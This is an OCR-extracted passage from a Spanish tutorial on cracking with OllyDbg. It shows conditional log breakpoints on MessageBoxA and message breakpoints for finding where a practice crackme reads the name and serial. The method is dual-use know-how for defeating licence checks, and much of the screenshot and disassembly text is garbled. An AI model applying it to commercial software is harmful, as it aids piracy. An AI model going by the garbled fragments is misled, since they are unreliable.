[STRING 123456]=="Brown fox" - true if memory starting from address 0x00123456 contains ASCII string "Brown fox 
FOX JUMPS", "brown fox???" or similar. The comparison is case-insensitive and limited in length to the length oftext e 


EAX=="Brown fox” - same as above, EAX is treated as a pointer. 


UNICODE [EAX]=="Brown fox” - OllyDbg treats EAX as a pointer to UNICODE string, converts it to ASCII and compe 


BREAKPOINT CONDICIONAL LOG 


Es un BPX condicional igual que el anterior, solo que en este caso podemos activar que nos loguee o nos 
guarde ciertos valores al pasar por el BPPX CONDICIONAL, en este caso las opciones son muchísimas, 
probaremos en el caso de una API que tiene varios accesos y queremos que loguee o nos guarde ciertos 
datos al pasar por ella. 

Usamos el ejemplo de la api pero puede ser colocado un BPX CONDICIONAL LOG en cualquier 
dirección sea api o no, reiniciemos el OLLY. 


Vamos a la dirección de la api, ya sabemos como CLICK DERECHO-GOTO EXPRESSION 


MOU EDI,EDI 
PUSH_EBP 
MOU EBP, ESP 

CMP_ DWORD PTR DS: [7707648C],08 


MOU EAX, DWORD PTR FS: [18] 
PUSH A 


PUSH DWORD _PTR_DS: [EAX+24] 
PUSH USER32.77D70B24 


TEST _EAX,EAX 

MOU DWORD PTR DS: [77D70B201,1 
PUSH A 

PUSH DWORD PTR SS: [EBP+14] 
PUSH DIORD PTR SS: [EBP+101 


PUSH DWORD PTR SS: [EBP+CJ 
PUSH DWORD _PTR SS: [EBP+8] 


kerne 132. Inter lockedCompareEx 


FF7S 08 
ES 20000000 


SD POP EBP 

c2 1000 RETN 10 

E] NOP 

98 NOP NA 


Allí estamos ahora hacemos CLICK DERECHO- BREAKPOINT- CONDICIONAL LOG 


[e] File View Debug Plugins Options Window Help 


e Jx]B/R].-. s] 
El » 


EN 


8350 Ecoqnzzz (CHE bl 
y 74 24 Copy » 
€4:B1 1800000 HOY El — pjrapy Ñ 


PUSH [ 
PusH 1 Assemble Space 
TESTÉ Label 

MOU DL : 
2OSHAd Comment , 


a > Fa 


132. Inter lockedCompareExchane 


FF75_ 08 pPusH E Runtrace » | Conditional shi 
Es 200600008 |CALLA 

5D POP Ef qe á Conditional log Shi 
c2 1008 RETNG New origin here CtrHGray , LS 

E ben Go to , | Runto selection F4 
E NGe 
30 ob Follow in Dump »| Memory, on access 


Vemos que nos aparece una ventana con más opciones 


Set conditional log breakpoint at USER32.M... (Xx) 


Condition: 


A | 


Explanation: Expression: 
e ” ] 
Decode value of expression as: | Assumed by expression Se ] 


Never  Oncondition Always Pass count [dec.] 


Pause program: aj e 2 D. 


Log value of expression: (5 s e 


Log function arguments: (e s a 


If program pauses, pass following commands to plugins: 


O E 


En este caso no haremos que pare en la api, solo que nos loguee ciertos datos de interés. 


Set conditional log breakpoint at USER32.M... 
Condition: 

| y] 
Explanation: Expression: 


y | = [lesp] y] 
Decode value of expression as: [Assumed by expression hd 


Never  Oncondition  Alway: Pass count [dec.] 


Pause program: Oj $ e. 0. 


Log value of expression: o. 7 (a 


Log function arguments: e e aj 


If program pauses, pass following commands to plugins: 


Como no queremos que pare no colocamos ninguna CONDICIÓN y en la opción PAUSE PROGRAM 
elegimos que no pare nunca o sea ponemos la marca en NEVER, 

Luego en LOG VALUE OF EXPRESIÓN ponemos que nos guarde el valor de [esp] que escribimos en el 
renglón EXPRESSION, que como sabemos será la dirección de retorno al programa desde la api, ya que 
es el valor superior del stack, por lo tanto en la segunda opción LOG VALUE OF EXPRESIÓN elegimos 
ALWAYS para que la LOGUEE siempre, y en el tercer renglón nos da la opción si queremos LOGUEAR 
los argumentos o parámetros de la función o api, pues no estará de mas, ponemos ALWAYS tambien. 


Vamos a la ventana LOG o L 


¿Window Help 


2 1jEjm)t]iwn]c//]k/8/r]/s] ¿=l3 


Y limpiamos la misma para ver claro lo que guarde el programa a partir de aquí con CLICK DERECHO- 
CLEAR WINDOW. 


Dump at address 
Dump in CPU 
Follow in Disassembler Enter 


Clear window h 
mB1-Cra 


Log to file 


w 


Copy to clipboard 
Appearance 


Vemos que también allí esta la opción de guardar lo logueado, en una fila de texto, si lo necesitamos lo 
podemos activar allí. 


Appearance » | 


Ahora doy RUN con f9 


Llego a la ventana del crackme y aun no hay en el LOG nada sobre nuestra api pues aun no paso por la 
misma. 


Vamos a REGISTER y pongamos un user y pass cualquiera. 


Register EJ 


Name narvaja 
Serial [s8o8osl IS 
OK Cancel 
Al apretar OK 


A No luck there, mate! 


y 7] 


Module C:WINDOWS>*WinS:+S5286_Microsoft. Windows. Common—Controls_6595b64144ccf 1c 
Module C: WINDOWS >system32nurztheme. dll 

Module C: WINDOWS *system32nSSSensor. dll 

Module C:sArchivos de programa“YahootwMessengerridle.dll 

COND: 6046137D 

77DO0S564EA| CALL to MessageBoxA from CRACKME. 66401378 

hOwner = 0606090884 ("CrackMe v1.0",class="No need to disasm the codet”) 

Text = "No luck there, matet” 

Title = "No luck?” 

Style = MB_OKiMB_ICONEXCLAMAT ION: MB_APPLMODAL 


Command y] 


Vemos allí que nos muestra aun sin haberse detenido el OLLY, la info de la MessageBoxA, primero el 
valor superior del stack que es 40137D o sea la dirección de retorno de la api, y luego los parámetros de 
la misma, en este caso que es un call desde 401378, el texto, el titulo etc. 


En este caso nos muestra solo una información pero que tal si una api se ejecuta 100 veces por ejemplo, 
podemos loguear todas a una fila de texto, pero si queremos que pare en una sola determinada de toas 
esas veces en ese caso, debemos usar la CONDICION. 


Si tuviera aquí una lista con la info de 100 veces diferentes que paro el programa en esa api, puedo 
colocarle algún dato que me da la info en la condición, por ejemplo la dirección de retorno en este caso, la 
puedo usar como condición y de esa forma solo parara de las 100, en la que regrese a 40137d, las que son 
llamadas de otras direcciones del programa no parara. 


Para ello reinicio el OLLY y voy nuevamente a la api y ahora pongo un BPX CONDICIONAL LOG así. 


Modifv conditional log breakpoint at USER3... [Xx] 


Conditior: 
[lesp]==40137d y] 


prertatin Expression: 
y | = [esp] ES 
Decode value of expression as: |Assumed by expression > 


Never  Oncondition Always Pass count [dec.] 


Pause program: c Í (e 2 0. 


Log value of expression: 2 £ aj 


Log function arguments: c e Oj 


If program pauses, pass following commands to plugins: 


Cambio la tilde para que solo pare cuando se cumpla la condición (ON CONDITION) y escribo la 
condición o sea que solo pare cuando [esp] sea igual a 40137D. 

En esta forma solo parara cuando pase por la api y sea el valor superior del stack 40137d el cual es la 
dirección de retorno de la api y me asegura que solo parara en esa. 


Corramos el programa pero ahora cuando vayamos a REGISTER coloquemos un nombre con números 
como ricnar456 y password 989898 


Register 


Name Iricnará56 
Serial [9s9sgel 


OK | Cancel | 


Recordamos que cuando poníamos un nombre que tenia números, paraba 2 veces en la api messageboxa, 
apretemos OK 


No luck! 
A No luck there, mate! 


Vemos que salio la primera MessageBoxA pero no paro OLLY en ella, vemos en el log la dirección de 
retorno es 4013C1 y no se activa la condición por ello no paro. 


lodule C:vfrchjvos de prosramaVahootMessengervidle. 


EA] COND: Epbia 
- oRA from CRACKME. 004013BC 
ms Cos32 ('CrackMe v1.0”,olass="No need tc 
Text = a Luck there, mate? 
Title = "No luckt” 
Style = ME Coki! MB_ICONEXCLAMAT ION: MB_APPLMODAL 


A o] pa 


Al apretar aceptar 


EDI,EDI 
PUSH_EBP 
MOU EBP,ESP 


CMP_ DWORD PTR DS: [77D704EC],0 
MOU EAX, DWORD PTR FS: [18] 
PUSH 


USH 
PUSH DWORD _PTR DS: [ERAX+24] 
PUSH USER32.77D70B24 


TEST_EAX,EAX 
MOU DWORD PTR DS: [77D70B207,1 
PUSH M 


kernel32, Interl 


Ahí si en la segunda vez que va a la api, se cumple la condición y para. 


Id 


| Conditional breakpoint at USER32. PERTETA 


Vemos que en la parte superior del stack esta el valor 40137d que fue el que activo el BPX 
CONDICIONAL LOG. 


A from CRACKME. 00461373 
[*"CrackMe v1.5",class="No need to disasm the code?” ) 
there, matet” 


ata 
0n4L 


LAMATION:MB_APPLMODAL 


A from CRACKME. 60401362 


y IN to C 1E-084 
ASCII "RICNAR4S6” 


0 


2821 RETIRA ta FRACKME. llndPenre fenm <.IMP. KERNEL 22. Fx itPrenness > 


3| Module 12 WINUUWS+SystemszvsSssSensor. all 
3| Module C:sArchivos de programa YahootsMessengerridle.dll 
COND: MA4B13C1 
CALL to MessageBoxA from CRACKME. 004013BC l 
hOwner = MB2C6832 (*"CrackMe v1.0", ,class="No need to disasm the codet”) 
Text = "No luck there, matet” 
Title = "No luck* 
Style = MB_ e MB_ICOMEXCLAMATION: MB_APPLMODAL 
77D504EA| COND: B040137D 
77D594EA| CALL to MessageBorA from CRACKNME. 00401378 
hOwner = 66206832 (*CrackMe vi. 6" ,class="No need to disasm the codet”) 
Text = "No luck there, matet” 
Title = "No luckt” 
Style = MB_OK¡MB_ICONEXCLAMAT ION: MB_APPLMODAL 
77D504EA|Conditional breakpoint at USER32. MessageBoxA 
yá __á<4>54=<+<4<— Y 


Ahí se ve claro que la segunda vez la dirección de retorno fue 40137D y nos muestra en el mismo LOG 
que la segunda vez se detuvo. 


3] VIGO LE La IWAL ITDLIWO VDY SD LEMIOLE MOIDOEIISUL LL 


3 Module C:sArchivos de O 


A|COND: BB4B13C1 

7 7DE04EA CALL to MessageBoA from CRACKME. 604013BC 

hOwner = MB2CB832 [("CrackMe v1.0”, ,class="No need to dis: 
Text = "No luck there, matet” 

Title = "No luck* 


Styl 'MB_ICONEXCLAMATION:MB_APPLMODAL 
770504EA| COND: 


77D504EA| CALL to essageBorA from CRACKME. 66401378 

hOwner = 662008832 (*CrackMe vi. 6” ,class="No need to dis: 
Text = "No luck there, matet” 
Title = "No luck t” 


¡ AL 


YYDSO4ER 


Bueno creo que con esto tienen para practicar un rato, aun quedan los MESSAGE BREAKPOINTS pero 
no quiero matarlos, lo dejamos para la parte 12 y luego de los MESSAGE BPX le prometo seguir 
crackeando un poco para no aburrirlos, pero esto deben saberlo antes de continuar. 


Hasta la parte 12 
Ricardo Narvaja 
27 de noviembre de 2005 


INTRODUCCIÓN AL CRACKING CON OLLYDBG parte 12 
Veremos la forma práctica de usar los MENSAJES en WINDOWS. 
Tengo esta cita que define un poco que son los mensajes en WINDOWS 


Los mensajes en Windows son usados para comunicar la mayoría de los sucesos, al menos en los niveles 
básicos. Si quieres que una ventana o control (el cual es una ventana especializada) haga algo, debes 
enviarle un mensaje. Si otra ventana quiere que vos hagas algo, entonces te envía un mensaje. Si ocurre 
un evento, como cuando el usuario mueve el mouse, presiona el teclado, etc... entonces el sistema la envía 
un mensaje a la ventana afectada. Dicha ventana recibe el mensaje y actúa adecuadamente. 


O sea que como ya sabemos, podemos en OLLYDBG trabajar poniendo BPX en las apis que realizan la 
mayoría de las funciones del programa, pero muchas veces resulta mas directo poner Breakpoints en estos 
mensajes que el programa envía directo al sistema llamados MESSAGE BREAKPOINTS o BMSG por la 
sigla que se utilizaba en SOFTICE para poder tipearlos. 


Existe un Bucle de mensajes en todo programa compuesto por varias apis, que no profundizaremos aquí, 
dichas apis se ocupan del tratamiento de los mensajes, el que quiera profundizar el tema, este es un 
tutorial bastante completo de cómo funcionan, aunque para el cracking no es necesario, profundizar tanto, 
mas vale saber que dichos mensajes existen y son procesados y en cual colocar BMSG para obtener un 
buen resultado. 


http://winprog.org/tutorial/es/message_loop.html 


Veremos como ejemplo el caso siguiente: para hallar seriales queremos que el programa rompa al apretar 
en el botón que ingresa nuestro nombre y serial, para luego analizar que operaciones realiza con ellos. 
Si abrimos el Crackme de Cruehead en OLLYDBG. 


[c] File View Debug Plugins Options Window Help 


A FAO sde ESPETEA 2 1]E/m]T/w]m]c] /]x]B]R]... s] 


PUSH 
CALL SonP. 8KERNEL32. GetModu leHandleA> 
re PTR DS: [4820CA],EAX 


F4204000 | PUSH CRACKME. B04020F4 ASCII "No need to disasm the codet” 
26040000 | CALL _<JMP. USER32.F indllindowA> 
5 OR EAX, ERX 


MOU DWORD PTR DS: [402064], 4003 
a . CrOs MOU DWORD PTR DS: [402068], ETE: WndPyr 
A AS MA AMARA PTR MS: 14A2ARF1. 


Vamos a ver primero el método con las apis, para ello miramos las apis que importa el programa, a ver 
cual es la encargada de realizar el trabajo de traer el texto que tipeamos para su procesamiento y futura 
comparación. 


Para ello en el listado hacemos CLICK DERECHO-SEARCH FOR-NAME (LABEL) IN CURRENT 
MODULE 


Backup » 
Copy e 
Binary » 
le = 100. 
Assemble Space o NULL 
Label 
= IDC_ARROW 
Cornment A NULL 
orA 
Breakpoint » 
Hit tr » fienur 
It trace lo need to disasm the codet"” 
ss = CRACKME. B0402064 
Run trace » frClassA 
NÚLE 
Go to > [Nue 
E ¡ UBB. (s2768.) 
Follow in Dump » 2009, (32768. 3 


nt module Ctrl+M 


Find felerences to » 
View » 


Name in all modules 


Command Cir 


Las apis mas usadas para ingresar texto son GetDlgltemTextA y GetWindowTextA, así que miraremos 
allí si están 


BB040326C]. idata Import «EndPage 

B6403200|. idata Import EndPaint 

60403240 |. ¡data Import «ExitProcess 
0403204 |. idata Import FindllindowA 
66403208|. ¡data Import Get DC 

B040320C |. idata Import GetDlgltem 
06403210) .idata | Import GetDlaltemTextA 
BB4B8321C |. idata Import 2 .GetLocalTime 
B0403214|.idata Import GetMessageA 
B0403238|. idata Import . GetModu leHandleA 
66403234 |. ¡data Import .GetOpenFi leNameA 
B0403230|. idata Import .«GetSaveF i leNameA De 
AAA TA DILO idatr- Tearmnrent + Oe mmle Ma immt 


Vemos que usa la api GetDlgltemTextA por lo cual seguro la utilizara para ingresar el texto 


Pongamos un BP en dicha api 


ind BP GetDlgltemTextA 


0) 
00403200|.idata | Import [Us 3 
60403210 .idata | Import USERS. GetDlgltemTextA 
BO4B321C|. idata Import GetLocalTime li 
ds in les a 
«¡data mport a , A 
00403284 .idata | Import Follow import in Disassembler 
SS: Follow in D 
a «¡data mport 
aio . ps nes lid MO DP 
«¡data mport etTeztMetrics! i ¡ 
00403138 si dat S Import eriin douRect Find references to import Enter 
«¡data mport oba oc ñ 
90403224 | .idata | Import GlobalFree View call tree 
10403248 . idata Import InitCommonCo 
60403188 . idata Import nval idateRect EEE AR, 
BB403134 . idata Import KillTimer point on import 
60403198). idata Import LoadRcce lerato o A > 
TAAALADA MA dat Trament arAD ie rmfl Canditional hraalinnint an irmnnrt 


Bueno una vez colocado el BPX en la api corremos el programa y vamos a ingresar nuestro user y pass 


Register 


Name 


Serial 


Inarvaja 
[989898 if 


FF7S 68 
Es ES9BFEFF 
8500 


74 BE 
FF7S 14 
FF7S 10 
50 

ES FE74FCFF 
EB_BE 

837D 14 60 
74 06 

8B45 10 


Cono Ba 
E 


DA 1nnaa 


CALL to GetD 
hbtilnd 5 
Control ID ( ) 
Buffer = CRACKME andas 


MOU EDI,EDI 

PUSH_EBP 

MOU EBP, ESP 

PUSH DWORD PTR SS: [EBP+CI 
PUSH DWORD _PTR SS: [EBP+8] 


TEST EAx,EAX 

PUSH DWORD PTR SS: CEBP+14] 
PUSH DWORD PTR SS: [EBP+10] 
PUSH EAXx 

CMP_OWORD PTR SS: [EBP+14],0 


MOV EAX, DWORD_PTR_SS: [EBP+10] 
MOU BYTE _PTR DS: [EAXJ,0 


20R EAX, ERAX 
POP EBP 
NeT An 


tA from CR 


= 554 ister”, cla 


A PDAPYME ara4íat 202 


Vemos que uno de lo parámetros de la api es el buffer, allí guardara el texto que estamos ingresando. 


Veamos el BUFFER en el DUMP con FOLLOW IN DUMP o yendo al DUMP y haciendo GOTO 
EXPRESSION=40218E 


BO4B12C9/PCALL to GetOlaltemlextA from CRACKTt 
BO4607FS || hlind = B44607FS ("Register”,olass= 
2| BOBBOSES|| ControllD = 3E8 (1000.) 
0402188 || Buffer = 
IPERES Count =B ( Address 
CRACKNME. B84E 
o Show ASCII dump 
10 
4| RETURN to US Show UMNICODE dump 


Lock stack 


(Em 


z A UE E 
3| CRACKME. 994€ Copy to clipboard 
00099000 ; 

GDÍ2FASS Modify 
00451253| CRACKME.. B4E : 
oa12FAs8 Edit 
a/[27024180| RETURN to U 
¿|| eegarzss| CRACKME.BB4E Push DWORD 

| o0000111 Pop DWORD 
00000111 Search for address 


OBGAÍBEO Search for binary stri 


0012FABC 
6B12FALO 
OB12FA1A 


¿| aásabaco Go to ESP 
a90n000a 


00000610 Go to EBP 


5|| passaaas 
gananozo Go to expression 
in Dump 


Allí lo vemos vacío pues aun no se ejecuto la api 


Pause 
Restart CctrkF2 
Close AIHF2 


Step into F7 
Step over Fe 
Animate into CtrF7 
Animate over CtrHF8 
Execute till return Ctr+F9 


Execute till user code AltF9 


narvaja. 


20D 


Si doy RUN nuevamente con F9 vuelve a parar en la api 


KME. 60401284 


="432770") 


AS 


CALL to TO from CR 
huind = Badr? FS er c 
Control ID 
Buffer = CR 


Dado 


De 


/E/60 66 66 00 66 06 06 Bb 
5/80 00 00 60 00 00 BO BA ....oo.. 
£E 61 72 76 61 6A 61 0B| narvaja. 
5/00 00 00 00 00 00 00 BO  ...ooo.. 
BO 66 00 BO 66 00 BO BB ....oo.. 
5/80 00 00 60 060 00 00 BA ....oo.. 


Y 


Y ingresa mi serial. 


Ya comprendemos que para la búsqueda de seriales correctos, debemos detenernos en donde ingresa 
nuestro nombre y serial o los datos que se nos pidan, mas adelante veremos como seguir hasta hallar el 
serial correcto. 


Bueno hemos parado en el punto en que ingresa nuestro user y serial con apis, ahora veamos como 
hacerlo con BMSG, ya que muchos programadores sabedores de que para obtener el serial debemos 


detenernos aquí, para complicar las cosas, no utilizan apis para ingresar el texto si no que lo hacen 
mediante mensajes de Windows. 


Quitemos los BREAKPOINTS que colocamos yendo a la ventana B y borrando todos con REMOVE 


mMINGOwW Help 


ii Ljejmjt]iwn]c//]k] 


lisassemb ly 
¡QU EDI,EDI 


ax eu] vis] $]1l 1] +] 1/e/mT)w]m/c]4[x]8/R]»..] 


Address | Module i Disassemb ly Comment 


Disable y Space 


| Edit condition 


Corramos nuevamente el programa y lleguemos hasta la ventana de ingresar el user y serial 


Register 


Name Inarvaja 
Serial [9s989s| D 


ox | 


Una de las diferencias entre trabajar con apis y con BMSG es que en las apis podemos poner un BPX al 
inicio del programa si sabemos que api utiliza, en cambio para poner BMSG debe estar creada la ventana, 
antes no podemos poner BMSG en ella. 


Para colocar el BMSG vamos a la ventana W o WINDOWS sin pausar el programa que continua 
RUNNING. 


'] 1JEjm/rj 


Disassemb ly 


Comment 


[Running 


Si la ventana WINDOWS se encuentra vacía, debemos hacer CLICK DERECHO — ACTUALIZE 


Proc L L d 
14080004 77D3E54F | 132770 
100000004 7703B00E| Button 
120000 | 0OBBBBBA 77D3ES592| Static 
5 a 0d D3B3C4 


rlajala 00 a 04| Main 
DO0003E9| 50010030| 0BBBB204 | Main 


B184073: 


Edi 
B0401128|No need to disasm the codet 


CrackMe v1.0 


Buscamos el BOTÓN, allí vemos marcada la línea en CLASS dice BUTTON y el titulo es OK como en 
nuestro BOTON. 


Hacemos CLICK DERECHO en esa línea y elegimos MESSAGE BREAKPOINT ON CLASSPROC 


1a4907FS Register Topmost 

pa410728 Cancel 904907F8 77 
p0SD0703 Serial 9a4907F8 77 
BOF20736 104907F8 rd 
al 18879c oK ETA Edd 

lame Ctualize 

BSBEB7CC 1O4907FE Ed 
01840738 CrackMe v1.B Topmost ll] 


Follow ClassProc 

Toggle breakpoint on ClassProc 
Conditional log breakpoint on ClassProc 
Message breakpoint on ClassProc 


Copy to clipboard » 


Set breakpoint on WinProc E 
Messages: Í Any message 


(+ Break on any window 
Break on all windows with same title 


€ Break on actual window only (invalid in next session] 


Never On message Pass count [dec.] 


Pause program: c Oj 0. 


Log WinProc arguments: c aj 


[Sort messages by name Cancel 


Vemos que nos sale esta ventanita la cual tiene para elegir que tipo de mensaje podemos utilizar si 
desplegamos el menú MESSAGES 


Set breakpoint on WinProc 


Drawing 
Scrolling 


Keyboard 
Clipboard 

Edit control 
Static control 


, BBB _WH_NULL 
Log W'inProc arguments: 


T” Sort messages by name 


Vemos que hay BMSG genérico para texto, Mouse, portapapeles, botones, cuando uno no sabe bien cual 
es el mensaje que se ultiliza el programa, puede intentar usar las opciones genéricas, pero en mi caso, 
usare el BMSG exacto, sigo bajando en el menú desplegable, ya que los años me han enseñado que 
cuando se hace click en un botón, se envía un mensaje WM_LBUTTONDOWN, primero cuando 
apretamos con el botón izquierdo por eso la L de LEFT y luego WM_LBUTTONUP cuando soltamos el 
botón izquierdo, así que pondremos el BMSG en este ultimo evento al soltar el botón, que es el 202. 


Set breakpoint on WinProc E 
Messages: a 


LE INITSTORAGE 
LB_ITEMFROMPOINT 

(* Bread 200 lIMUMOUSEMOUE 
WNCLBUTTONDOWN 


WICREUTTONDONN 
O Break 205 WMCRBUTTONUP 
WHÁRBUTTONDBLCLK 
-_————— WICMBUTTONDOWN 
——— WICMBUTTONUP 
WICMBUTTONDBLCLK 
WICMOUSEWHEEL 
WITXBUTTONDOWN 
P WICXBUTTONUP 
: WIÁXBUTTONDBLCLK 
210 WM PARENTNOTIFY 


Log W'inProc arguments: Q 


[Sort messages by name Cancel | 


Quedaría así 


Set breakpoint on WinProc 


Messages: 262 WM_LBUTTONUP ba 


r 


(+ Break on any Window 


Break on all windows with same title 


Break on actual window only (invalid in next session) 


Never On message Pass count (dec.] 
Pause program: o 


Log W'inProc arguments: 9 


Sort messages by name 


Elegido el tipo de mensaje 202 WM_LBUTTONUP, ponemos la marca en BREAK ON ANY WINDOW, 
y en PAUSE PROGRAM, que pare ON MESSAGE o sea cuando se ejecute el mensaje que elegimos, y 
abajo LOG WINPROC ARGUMENTS, ya que nunca viene mal que loguee los argumentos de algo. 


LA pah Tian] —— ¡2 a a SA Ea) TR rea CIC | 
Handle ead 


1049! mos 
2o41erzo cel 0D4907F8 00BR4 
o O 
B11A679C [ok DO4307FS '3EA| SOD1BB0a 

01 1E0682 0 00| oaganes 


BSBEB?CC i 
b1840738 CrackMe v1.B B0D40718| 1CCFo00a Becco1os Main 


ba401128 ÑO Mesa to disasm the codet 


Vemos que como elegimos en cualquier ventana lo coloco en los dos botones que hay OK y CANCEL, no 
hay problema, ahora apretemos OK. 


DI,El 
PUSH_EBP 
MOU EBP,ESP 
MOU ECX, DWORD PTR SS: [EBP+8] 
PUSH ESI 


MOV ESI,EAX 
TEST ESI,ESI 


MOU EDX,DWORD PTR SS: LEBP+C] 
CMP_EDX,DWORD_PTR_DS: [77D700E8] 


X0R EAX, EAX 

MOV ECX, EDX 

AND ECX, 7 

INC EAX 

SHL EAX, CL 

PUSH EDI 

MOU EDI,DWORD PTR DS: [77D700EC] 
U ECX;EDX 


mera to Assumed WinProc 
hlind = B11AB79C ("OK” ,cl 
= WM_LBUTTO INUP 


rom USER32. 77018731 


ss=*Button” ,parent=0M4957F3) 


F 
3 


Aquí es donde se pierden muchos porque dicen que parando con este método, quedan en el medio de la 
nada ya que la dirección de retorno, no pertenece al programa pero retornar es muy sencillo. 


D03C0000' 0OBB2000 
00300000 
DO3ED000 
epica 


1444041 bh data 
20493000 00001000 CRACKME i imports 
500404000 / 009001000 | CRACKME exports 
60405000 009061000 | CRACKME | .reloc relocations 
60406000 | 00062000 / CRACKME | .rsro resources 
00410000 | 00BB7BDB 


Sabemos que el programa se ejecuta en la sección que comienza en 401000, así que pongo un BPM ON 
ACCESS en dicha sección para que pare cuando ejecute algo allí. 


D03D0990| 090004900 poiv| Ru 
DO3E0000 | BABBZ000 Hao 
DA3FOD9 | 00BBIa0n ES AEN Bu 
00400000| 00001600| CRACKME PE hesder_ | Inso|K RWE 
00401000 0001000 CRACKME | CODE code 
00402090 |09091900| CRACKME | DATA data Actual 
00403000 |00001600| CRACKME |. idata | imports 1 Clualize 
B0404000|00001000| CRACKME | .edata |exports Ir 
00405008 DOO01000| CRACKME | .reloc [relocations Ir View in Disassembler Enter 
0406000 | 09002000 | CRACKME | .rsrc resources Ir 
00410090| 09007000 Mí Dump in CPU 
20409990 | 09002900 Mi 
D04E0000 | 00193000 > Dump 
dEErcoss ses:asas E 

12) 15] él 
BOCFaaaa| anasanas m Search Ctra 
a pe pescer. [$ 

'ensor eader r 
0S2D1000 B0UB3000|SSSensor| .tent [code If Setbreak-on-access F2 
B62DA000| 69002000 | SSSensor| .rdata imports, exp: 
B62DC000| B90BSOBB| SSSEnsor| .data data 1 = 
M62E1090| 69001000| SSSensor| .shared Ir set me y breal point on al s 
ds 2E3000| oonacose| Sssencor :seleo |relecar lens If Set a Y 
ensor| .reloc [relocations| Ir et memory breakpoint on wri 

SeC30090| 09091900| COMCTL3Z PE header | Ir y Pl 


Al dar RUN paramos allí 


Cs 600B0a 
53 


= o. -- 


¡Hua ema] B rs] E 


Ñ 


74 34 

la 11011 CMP_OWORD PTR SS: [EBP+CJ,111 
837D 6C 16_ [CMP OWORD_PTR SS: [EBP+C],10 
BFS4 ep 

817D 06C 61021 CMP_DWORD_PTR SS: [EBP+C],201 


74 BC 
E 00900068 |MOU EAX, O 


z lo 
1000 


Bi rase = TRUE 
6A 00 PUSH A pRect = NULL 
FF75 08 PUSH DWORD PTR_SS: [EBP+8] hbind 

Es eso10000 | CALL <JMP.2USERSZ2. InvalidateReot> Inval idateRect 
FF7S5 08 PUSH DWORD PTR_SS: CEBP+8] hbind 

a a SetFocus 


3300 Z0R EAX, ERX 
ei ass CMP_DWORD_PTR SS: [EBP+10],SEB 


A EABS1 | CMP DWORD PTR SS: [EBP+10],S3EA 


6A BB PUSH 0B Count = B (11.) 

68 2E214000 || PUSH CRACKME. 004021SE Buffer = CRACKME. 6040218E 

63 ESO36066 || PUSH 3ES ControlID = 3E8 (1000. ) 
PUSH DWORD PTR_ SS: [EBP+8] hlind 


FF7S_ 08 

Es 07020000 
e3Fs 01 CMP EAXx, 1 

MN EB931 | MOV DWORD _PTR SS: CEBP+10],3EB 


GetDlgltemTextA 


SIN QUITAR EL BPM ON ACCESS voy apretando F9 lo cual será como ir ejecutando línea a línea pero 
solo las instrucciones de esta sección. 


3308 | XOR EAX, EAX 
8170 10 EBO31]| CMP_ DWORD _PTR SS: [EBP+10],3EB 
Y JE SHORT CRACKME.B04012F? 
al Ne SHORT IERACKME-aO4GIZrO 
6A BB PUSH BB Count = B (11.) 
63 2E214000 || PUSH CRACKME. 0048218E Buffer = CRACKME.B040218E 
63 ES930000 || PUSH 3E8 ControlID = 3E8 (1000, ) 
FF75 08 PUSH DWORD PTR SS: [EBP+8] hlind 
Es 67020009 || CALL <JMP.SUSER32.GetDlgltemTextA> GetDlgltemTextA 
83F8 M1 CMP EAX, 1 
c748, 10 EBO31]| MOU DWORD PTR SS: [EBP+10],3EB 
A JB SHORT CRACKME. 040121 
6A BB PUSH BB Count = B (11.) 
682 7E214000 | PUSH CRACKME. 0040217E Buffer = CRACKME.B040217E 
63 E9B30000 | PUSH 3E9 ControlID = 3E9 (1001.) 
FF75 88 PUSH DWORD PTR SS: [EBP+8] hlind 
ES E7B10000 | CALL -<JMP.SUSERS2.GetDlaltemTertA> GetDlaltemTextA 
BS 61000000 |MOU EAX,1 
v EB 07 JMP SHORT CRACKME. 084012F7 
Es 660000 |MOU EAX,O 
» EB 8D JMP SHORT CRACKME. 00401284 
E EUSQIEAA TUNE E Result 


Vemos que enseguida luego de ejecutar dos veces hasta el RET caemos en las llamadas a 
GetDlgltemTextA que leen el user y serial que tipeamos, de forma que llegamos al mismo lugar sin haber 
utilizado BPX en las apis en este caso. 

Si el programa no hubiera utilizado apis para entrar el texto, hubiéramos llegado con los BMSG al mismo 
punto donde ingresara el texto y podremos empezar a trabajar la rutina del serial lo cual veremos en 
próximas partes. 


En el caso que quisiéramos parar al apretar una tecla, podemos intentarlo también borramos el B”PM ON 
ACCESS haciendo CLICK DERECHO-REMOVE MEMORY BREAKPOINT en cualquier parte del 
listado. 


E EB Eds Lsetrocus 
E 1 
> 33008 XOR EAX, EAX 
- 817D_10 EROS Backup » 
8170 10 Enoal| cur DwuoRO PTA COPY » 
vw 75 3B JNZ SHORT CRAC ; 
- 64 0B PUSH 0B | Binary » fe c11.) 
. 68 SEz14000 || PUSH CRACKME. a CRACKME. 0040218E 
. 68 Esasee0a || PUSH 3E8S | Assemble Space D = 3E8 (1098.) 
. FF75 08 PUSH DWORD PTR 
a . ES 67020000 || CALL-<JMP.QUSE — Label : enTextA 
a - 83F8 M1 CMP EAX, 1 | 
al -, 574510 EBest| HoU_BUORO PTE Comment ; 
6A 68 PUSH BE | 
ES Escsooss |buen Seg 1099 ve 
. FF75 08 PUSH DWORD PTR Hit trace » Conditional Shi 
. ES E7010090 | ys q 
E) ES 31000000 idktacancd Run trace »|  Conditional log Shi 
E Es Gguases |MOU EBx.6 AA e á 
Y En SH ; Goto » Memory, on access 
:[0012FA001=0000B3EA Follow in Dump » Memory, on write 


View call ree Ctrl 


Address | Hex du ASCII 


Y vamos a la ventana B y borramos los BMSG anteriores con REMOVE 


¡AED A A A) JO E] PJ AJA EJ 
Address |Module  |Active Disassemb ly 


Ponemos el programa a correr nuevamente y llegamos a la ventana de ingresar el user y serial pero esta 
vez no ingresamos nada. 


Register 


OK Cancel 


Vamos a la ventana W 


104907FS Register 14030004 


00410728 Cancel (ala) DOBBBSEB| 5OB10000 Button 
pOSDa70S Serial B04907FS DODOFFFF | 50020000 Statio 
DOF 20736 004907F8 000003ES| 50010080| DOBBBZ04 Edit 
B11AB79C DK BB4907FS POBBBSEA SOB100B1 BOBABBMA 77D3B90E Button 
011E06B2 Name B04907FS DOBOFFFF| 50020000 | 00000004 77D3ES92| Static 
BSBEB7CC B04907F8 000003E9| 50010030| 0OBBBZ04 77D3B3C4|Edit Ñ 
B1340738 CrackMe vi.0 Topmost 00040718| 1CCF0000| 60BBB100 B0401128|No need to disasm the codet 


Y repetimos el procedimiento anterior pero esta vez eligiendo 


Messages: Any message 


= "a 


BMOGET IMAGE 
BMHSETIMAGE 
